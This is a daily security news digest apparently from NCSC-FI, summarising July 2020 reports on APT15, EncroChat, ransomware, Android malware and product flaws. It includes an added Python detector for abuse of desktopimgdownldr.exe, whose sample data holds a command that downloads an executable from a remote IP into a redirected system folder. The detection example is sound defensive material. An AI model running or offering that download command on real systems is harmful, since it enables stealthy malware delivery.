Daily NCSC-FI news followup 2020-07-02

Connection discovered between Chinese hacker group APT15 and defense contractor

www.zdnet.com/article/connection-discovered-between-chinese-hacker-group-apt15-and-defense-contractor/ Lookout said it linked APT15 malware to Xi’an Tianhe Defense Technology, a Chinese defense contractor. In a report published today, cyber-security firm Lookout said it found evidence connecting Android malware that was used to spy on minorities in China to a large government defense contractor from the city of Xi’an.

Hundreds arrested after encrypted messaging network takeover

www.bleepingcomputer.com/news/security/hundreds-arrested-after-encrypted-messaging-network-takeover/ European law enforcement agencies arrested hundreds of suspects in several countries including France, Netherlands, the UK, Norway, and Sweden after infiltrating the EncroChat encrypted mobile communication network used by organized crime groups. EncroChat phones used by international criminal networks around the world to exchange encrypted data and millions of messages came with dual operating systems (Android OS and the EncroChat OS).

Inside a ransomware attack: From the first breach to the ransom demand

www.zdnet.com/article/inside-a-ransomware-attack-from-the-first-breach-to-encrypting-a-network-in-just-two-weeks/ Security researchers map out how a ransomware attack plays out over a two week period.

Ransomware Gangs Don’t Need PR Help

krebsonsecurity.com/2020/07/ransomware-gangs-dont-need-pr-help/ We’ve seen an ugly trend recently of tech news stories and cybersecurity firms trumpeting claims of ransomware attacks on companies large and small, apparently based on little more than the say-so of the ransomware gangs themselves. Such coverage is potentially quite harmful and plays deftly into the hands of organized crime.

Hacker ransoms 23k MongoDB databases and threatens to contact GDPR authorities

www.zdnet.com/article/hacker-ransoms-23k-mongodb-databases-and-threatens-to-contact-gdpr-authorities/ The hacker has attempted to ransom nearly 47% of all MongoDB databases left exposed online.

This is how EKANS ransomware is targeting industrial control systems

www.zdnet.com/article/this-is-how-ekans-ransomware-is-targeting-industrial-control-systems/ New samples of the ransomware reveal the techniques used to attack critical ICS systems. report:


FakeSpy Android Malware Spread Via ‘Postal-Service’ Apps

threatpost.com/fakespy-android-malware-spread-via-postal-service-apps/157102/ New ‘smishing’ campaigns from the Roaming Mantis threat group infect Android users with the FakeSpy infostealer.

Sixteen Facebook apps caught secretly sharing data with third-parties

www.zdnet.com/article/sixteen-facebook-apps-caught-secretly-sharing-data-with-third-parties/ Academic study used unique “honeytoken” emails to install Facebook apps and see which inboxes received emails from unrecognized senders.

Alina Point Of Sale Malware Still Lurking In DNS


G DATA threat report: Number of cyber attacks increases significantly in the first quarter

www.gdatasoftware.com/blog/2020/07/36199-number-of-cyber-attacks-increases-significantly-in-the-first-quarter The current threat analysis by G DATA CyberDefense shows that the number of attacks prevented in March 2020 increased significantly: the cyber defence company averted almost a third more attacks than in February. Especially active – GuLoader and Trickbot. Old tricks, new losses – tech support scams.

GoldenSpy backdoor installed by tax software gets remotely removed

www.bleepingcomputer.com/news/security/goldenspy-backdoor-installed-by-tax-software-gets-remotely-removed/ As soon as security researchers uncovered the activity of GoldenSpy backdoor, the actor behind it fell back and delivered an uninstall tool to remove all traces of the malware. GoldenSpy stayed hidden in software called Intelligent Tax, from Aisino Corporation, that a Chinese bank required its company customers to install for paying local taxes.

Apache Guacamole Opens Door for Total Control of Remote Footprint

threatpost.com/apache-guacamole-control-remote-footprint/157124/ Several vulnerabilities can be chained together for a full exploit. Apache Guacamole, a popular infrastructure for enabling remote working, is vulnerable to a slew of security bugs related to the Remote Desktop Protocol (RDP), researchers have warned. Admins should update their systems to avoid attacks bent on stealing information or remote code-execution. report:

www.huoltovarmuuskeskus.fi/miten-valita-turvallinen-etatyovaline-ohjeita-ja-vinkkeja-avuksi/ Many people have wondered this year which remote-work application is safe to use. This gave rise to the idea of a guide that helps organisations, their employees and those responsible for information security compare different remote-work tools and choose a suitable one from the many options. The guide was commissioned by the Digipooli of the Huoltovarmuusorganisaatio (National Emergency Supply Organisation).

NSA releases guidance on securing IPsec Virtual Private Networks

www.bleepingcomputer.com/news/security/nsa-releases-guidance-on-securing-ipsec-virtual-private-networks/ The US National Security Agency (NSA) has published guidance on how to properly secure IP Security (IPsec) Virtual Private Networks (VPNs) against potential attacks.

Windows 10 background image tool can be abused to download malware

www.bleepingcomputer.com/news/security/windows-10-background-image-tool-can-be-abused-to-download-malware/ A binary in Windows 10 responsible for setting an image for the desktop and lock screen can help attackers download malware on a compromised system without raising the alarm. Researchers from SentinelOne discovered that “desktopimgdownldr.exe”, located in Windows 10’s system32 folder, can also serve as a LoLBin (a living-off-the-land binary, a signed OS component repurposed by an attacker).
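A detection-side illustration, added here and not taken from the article or SentinelOne's write-up: score process-creation events for abuse of desktopimgdownldr.exe. The binary takes a `/lockscreenurl:` argument naming the image to fetch and an `/eventName:` argument; the example treats a remote URL, a non-image filename, a scripting-shell parent and a parent that overrides `SYSTEMROOT` (which changes where the file is written) as signals. The event records, the field names, the allow-list of shells and the score weights are constructed assumptions, not Sysmon or EDR schema.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass
class ProcEvent:
    """Minimal process-creation record (constructed shape, not a real telemetry schema)."""
    image: str
    command_line: str
    parent_image: str
    parent_command_line: str


# Assumed list of parents that should not normally be launching a lock-screen image fetch.
SHELL_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
IMAGE_SUFFIXES = (".jpg", ".jpeg", ".png", ".bmp")
LOCKSCREEN_URL = re.compile(r"/lockscreenurl:(\S+)", re.IGNORECASE)
SYSTEMROOT_OVERRIDE = re.compile(r"\bSYSTEMROOT\s*=", re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Return (score, reasons). Score 0 means the event is not a desktopimgdownldr download at all."""
    reasons: list[str] = []
    if basename(ev.image) != "desktopimgdownldr.exe":
        return 0, reasons
    m = LOCKSCREEN_URL.search(ev.command_line)
    if not m:
        return 0, reasons
    url = m.group(1).strip('"')
    score = 0
    if urlparse(url).scheme.lower() in ("http", "https"):
        score += 1
        reasons.append(f"remote lockscreen URL {url}")
    if not urlparse(url).path.lower().endswith(IMAGE_SUFFIXES):
        score += 2
        reasons.append("URL does not name an image file")
    if basename(ev.parent_image) in SHELL_PARENTS:
        score += 2
        reasons.append(f"launched from scripting shell {basename(ev.parent_image)}")
    if SYSTEMROOT_OVERRIDE.search(ev.parent_command_line):
        score += 3
        reasons.append("parent overrides SYSTEMROOT (redirects the download directory)")
    return score, reasons


def triage(events: list[ProcEvent], threshold: int = 3) -> list[tuple[ProcEvent, int, list[str]]]:
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev, score, reasons))
    return hits


# Constructed sample events: a plausible MDM-style wallpaper fetch, an abuse case, and noise.
SAMPLE_EVENTS = [
    ProcEvent(
        image=r"C:\Windows\System32\desktopimgdownldr.exe",
        command_line=r"desktopimgdownldr.exe /lockscreenurl:https://cdn.corp.example/wallpaper.jpg /eventName:desktopimgdownldr",
        parent_image=r"C:\Windows\System32\svchost.exe",
        parent_command_line=r"C:\Windows\System32\svchost.exe -k netsvcs -p",
    ),
    ProcEvent(
        image=r"C:\Windows\System32\desktopimgdownldr.exe",
        command_line=r"desktopimgdownldr.exe /lockscreenurl:http://198.51.100.7/x.exe /eventName:desktopimgdownldr",
        parent_image=r"C:\Windows\System32\cmd.exe",
        parent_command_line=r'cmd.exe /c set "SYSTEMROOT=C:\Windows\Temp" && desktopimgdownldr.exe /lockscreenurl:http://198.51.100.7/x.exe /eventName:desktopimgdownldr',
    ),
    ProcEvent(
        image=r"C:\Windows\System32\notepad.exe",
        command_line="notepad.exe",
        parent_image=r"C:\Windows\explorer.exe",
        parent_command_line="explorer.exe",
    ),
]

if __name__ == "__main__":
    for ev, score, reasons in triage(SAMPLE_EVENTS):
        print(f"score={score} parent={basename(ev.parent_image)}: " + "; ".join(reasons))
```

The weights are deliberately additive so that a single remote URL from the expected service host scores low while a shell-spawned fetch of a non-image file with a redirected `SYSTEMROOT` stands out; tune the threshold against how the binary is legitimately used in your estate.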

ENISA Launches Public Consultation for First Candidate Cybersecurity Certification Scheme

www.enisa.europa.eu/news/enisa-news/enisa-launches-public-consultation-for-first-candidate-cybersecurity-certification-scheme The EUCC Candidate Scheme for ICT Products, set to replace the SOG-IS, is released today for public feedback.

We discovered the Palo Alto SAML vulnerability (CVE-2020-2012). There’s lots of confusion about the role of the ‘Disable cert validation’ check box in this issue. TLDR; Having this turned off is standard, expected, and not bad practice. Patch your PA, and leave this off.

